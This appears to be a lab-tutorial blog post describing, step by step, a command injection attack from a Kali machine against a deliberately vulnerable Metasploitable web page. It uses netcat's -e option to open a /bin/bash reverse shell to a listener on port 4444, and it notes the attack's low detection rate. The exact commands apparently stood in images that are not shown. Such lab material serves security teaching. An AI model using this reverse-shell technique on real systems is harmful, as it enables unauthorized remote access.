Thursday, April 12, 2018

Command Injection (II): Reverse shell connection with NetCat


- Layout for this exercise:

- This exercise is based on the previous one:

- Now, the goal is to perform a Command Injection attack from the web browser of the attacker Kali Linux against a victim Metasplotaible, injecting NetCat commands:

Three of the most interesting characteristics of this attack are:

  • No file is uploaded to the victim so the detection rate would be low
  • No need of writable permissions over the web server folder on the victim's side 
  • The tool (NetCat) is usually present in most of the Linux/Windows machines

- First, let check that ci.php (allows Command Injection due to lack of input sanitization, as seen at previous exercise) is available at the victim side Metasploitable's web server folder /var/www:

- From Kali:

- NetCat (nc) has two options (-c and -e), considered dangerous by the program itself, that execute commands remotely:

- Setting a listening session on port 4444 at the attacker side:

- Now, entering through Kali's browser the NetCat command which executes (-e) remotely a shell (/bin/bash):

- It is interesting to notice the Connecting notification, meaning it is waiting to the connection at the other side:

 - Finally the attacker Kali achieves a reverse shell connection from the Metasploitable victim's side: